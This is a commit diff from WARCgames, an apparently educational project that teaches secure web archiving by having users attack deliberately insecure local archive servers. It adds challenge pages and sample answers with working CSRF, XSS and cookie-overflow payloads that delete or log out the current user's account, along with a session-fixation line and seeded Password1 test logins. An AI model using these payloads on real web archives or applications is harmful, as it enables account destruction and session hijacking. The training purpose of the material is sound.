Reorg, new challenges and sample answers

harvard-lil · Jun 11, 2017 · 3df6024 · 3df6024
1 parent f46db10
commit 3df6024
Show file tree

Hide file tree

Showing 23 changed files with 252 additions and 96 deletions.
diff --git a/README.md b/README.md
@@ -5,6 +5,8 @@ Building secure web archival tools is hard, because web archives have to ingest
 content. WARCgames challenges you to attack deliberately-insecure, simplified web archive services running on your local
 computer, and thereby learn to create secure ones.
 
+![WARCgames browser screenshot](docs/screenshot.png)
+
 Install and Run
 ---------------
 
@@ -16,6 +18,6 @@ Install and Run
 
 4) `cat hosts | sudo tee -a /etc/hosts` (or otherwise arrange for the domains in the `hosts` file to resolve to localhost)
 
-4) `python challenge.py` to see a list of challenges.
+4) `python warcgames.py` to see a list of challenges.
 
-5) `python challenge.py same_domain` to start the first challenge.
+5) `python warcgames.py same_domain` to start the first challenge.
diff --git a/archive_server b/archive_server
diff --git a/archive_server_overlays/__init__.py b/archive_server_overlays/__init__.py
diff --git a/archive_server_overlays/archive_server_templates/templates_src/index.html b/archive_server_overlays/archive_server_templates/templates_src/index.html
@@ -38,13 +38,22 @@ <h1 class="text-center"><strong>{{ metadata.product }}</strong></h1>
     </div>
 
     <div class="row">
-        <h4 class="text-center" style="margin-bottom: 30px">A simplified web archive designed to explore security issues in web archiving.</h4>
+        <h4 class="text-center" style="margin-bottom: 30px">A simplified web archive to explore security issues in web archiving.</h4>
     </div>
 
-    <div class="row">
+    <div class="alert alert-danger" role="alert">
         {% include 'challenge.html' %}
     </div>
 
+    <div class="alert alert-success" role="alert">
+      <h4>Available Logins</h4>
+      <p>You can use these logins if necessary to complete the current challenge:</p>
+      <ul>
+        <li>David Lightman: david - Password1</li>
+        <li>Jennifer Mack: jennifer - Password1</li>
+      </ul>
+    </div>
+
     {% include 'homepage_message.html' %}
 
     <div class="row top-buffer-lg bottom-buffer-lg">

diff --git a/attacker_server.py → archive_server_overlays/attacker_server.py b/attacker_server.py → archive_server_overlays/attacker_server.py
@@ -10,7 +10,7 @@
     import socketserver as SocketServer
 
 current_dir = os.path.abspath(os.path.dirname(__file__))
-attacker_path = os.path.join(current_dir, 'attacker_files')
+attacker_path = os.path.join(os.path.dirname(current_dir), 'challenges')
 attacker_port = 8090
 
 def main():

diff --git a/archive_server_overlays/docker-compose.override.yml b/archive_server_overlays/docker-compose.override.yml
@@ -9,9 +9,11 @@ services:
             WR_TEMPLATE_PKG: archive_server_templates
             WR_USER_CONFIG: /overlays/user_config.yml
 
+        command: bash /overlays/init_app_server.sh
+
     attacker:
         build: ./webrecorder
-        command: python /code/attacker_server.py
+        command: python /code/archive_server_overlays/attacker_server.py
         depends_on:
             - app
 

diff --git a/archive_server_overlays/init_app_server.sh b/archive_server_overlays/init_app_server.sh
@@ -0,0 +1,8 @@
+# add /code to PYTHONPATH
+export PYTHONPATH=`pwd`:$PYTHONPATH
+
+# create users
+python webrecorder/admin.py -c david@example.com david Password1 archivist 'David Lightman'
+python webrecorder/admin.py -c jennifer@example.com jennifer Password1 archivist 'Jennifer Mack'
+
+uwsgi /code/apps/frontend.ini
diff --git a/attacker_files/answer_same_domain.html b/attacker_files/answer_same_domain.html
diff --git a/attacker_files/answer_same_subdomain.html b/attacker_files/answer_same_subdomain.html
diff --git a/attacker_files/challenge_same_domain.html b/attacker_files/challenge_same_domain.html
diff --git a/attacker_files/challenge_same_subdomain.html b/attacker_files/challenge_same_subdomain.html
diff --git a/attacker_files/README.txt → challenges/README.txt b/attacker_files/README.txt → challenges/README.txt
diff --git a/challenges/csrf/challenge.html b/challenges/csrf/challenge.html
@@ -0,0 +1,10 @@
+<html>
+<head>
+    <script>
+      // Write your answer here:
+    </script>
+</head>
+<body>
+    <p>When archived or played back, the script tag in this page should use cross-site request forgery to delete the current user account.</p>
+</body>
+</html>
diff --git a/challenges/csrf/config.py b/challenges/csrf/config.py
@@ -0,0 +1,9 @@
+short_message = "Use cross-site request forgery to control an archive user's account."
+message = """
+    <p>In this challenge, the archive server is configured to disable cross-site request forgery protection.
+    This means captured web content can submit web forms on behalf of a logged in user.</p>
+
+    <p>Your mission is to edit {challenge_path}/challenge.html so that, when 
+    <a href="{challenge_url}challenge.html">{challenge_url}challenge.html</a> is captured or played back,
+    the current user's account is deleted.</p>
+"""
diff --git a/challenges/csrf/sample_answer.html b/challenges/csrf/sample_answer.html
@@ -0,0 +1,18 @@
+<html>
+<head>
+  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
+  <script>
+    $(function(){
+      var deleteUrl = wbinfo.top_url.split('/').slice(0,4).join('/')+'/$delete';
+      $('#deleteForm').attr('action', deleteUrl);
+      $('#deleteForm').submit();
+    });
+  </script>
+</head>
+<body>
+  <p>When archived, the script tag in this page should use cross-site request forgery to delete the user account.</p>
+  <form id="deleteForm" method="post" action="">
+    <input type="submit">
+  </form>
+</body>
+</html>
diff --git a/challenges/same_domain/challenge.html b/challenges/same_domain/challenge.html
@@ -0,0 +1,10 @@
+<html>
+<head>
+    <script>
+      // Write your answer here:
+    </script>
+</head>
+<body>
+    <p>When archived or played back, the script tag in this page should use cross-site scripting (XSS) to delete the current user account.</p>
+</body>
+</html>
diff --git a/challenges/same_domain/config.py b/challenges/same_domain/config.py
@@ -0,0 +1,11 @@
+CONTENT_HOST = "warcgames.test:8089"
+short_message = "Use cross-site scripting (XSS) to control an archive user's account."
+message = """
+    <p>In this challenge, the archive server is configured to serve the user interface and captured web archive content
+    on the same domain. This means captured web content can use cross-site scripting (XSS) to control user accounts on the
+    archive server.</p>
+
+    <p>Your mission is to edit {challenge_path}/challenge.html so that, when 
+    <a href="{challenge_url}challenge.html">{challenge_url}challenge.html</a> is captured or played back,
+    the current user's account is deleted.</p>
+"""
diff --git a/challenges/same_domain/sample_answer.html b/challenges/same_domain/sample_answer.html
@@ -0,0 +1,29 @@
+<html>
+<head>
+  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
+  <script>
+    $(function(){
+      // get settings page URL
+      var settingsUrl = wbinfo.top_url.split('/').slice(0,4).join('/')+'/_settings';
+
+      // add an iframe to the top level and navigate to settings
+      $('body', window.__WB_top_frame.document).append('<iframe id="deleteFrame" src="'+settingsUrl+'"></iframe>');
+
+      // run inside iframe once a second, as a simple way to run once iframe is loaded
+      setInterval(function(){
+
+        // get jquery reference to iframe contents
+        var $iframe = $('#deleteFrame', window.__WB_top_frame.document).contents();
+
+        // click delete button and confirm
+        $iframe.find('button[data-target="#confirm-delete-modal"]').click();
+        $iframe.find('#confirm-delete').click();
+
+      }, 1000);
+    });
+  </script>
+</head>
+<body>
+  <p>When archived or played back, the script tag in this page should use cross-site scripting (XSS) to delete the current user account.</p>
+</body>
+</html>
diff --git a/challenges/same_subdomain/challenge.html b/challenges/same_subdomain/challenge.html
@@ -0,0 +1,10 @@
+<html>
+<head>
+  <script>
+    // Write your answer here:
+  </script>
+</head>
+<body>
+  <p>When archived or played back, the script tag in this page should use top-level cookies to log out the current user.</p>
+</body>
+</html>
diff --git a/challenges/same_subdomain/config.py b/challenges/same_subdomain/config.py
@@ -0,0 +1,13 @@
+CONTENT_HOST = "content.warcgames.test:8089"
+short_message = "Use top-level cookies to log out the current user."
+message = """
+    <p>In this challenge, the archive server is configured to serve captured web archive content at a subdomain
+    of the user dashboard. This means that captured pages can overwrite session cookies with new top-level cookies.</p>
+
+    <p>Your mission is to edit {challenge_path}/challenge.html so that, when 
+    <a href="{challenge_url}challenge.html">{challenge_url}challenge.html</a> is captured or played back,
+    the current user is logged out.</p>
+    
+    <p><b>Bonus:</b> With a bit more effort, you can log in the user as a different user -- for example, any visitor
+    could be logged into an account controlled by the attacker.</p>
+"""
diff --git a/challenges/same_subdomain/sample_answer.html b/challenges/same_subdomain/sample_answer.html
@@ -0,0 +1,17 @@
+<html>
+<head>
+  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
+  <script>
+    // fill up cookie jar to wipe login cookie
+    for (i = 0; i < 1000; i++) {
+      document.cookie = "cookie" + i + "=chocolate-chips;";
+    }
+
+    // bonus: log the user in as the attacker, if you have a valid session key:
+    // document.cookie = "__wr_sesh=someone_elses_session_key; domain=warcgames.test; path=/";
+  </script>
+</head>
+<body>
+  <p>When archived, the script tag in this page should log out the user by deleting their session cookie.</p>
+</body>
+</html>
diff --git a/docs/screenshot.png b/docs/screenshot.png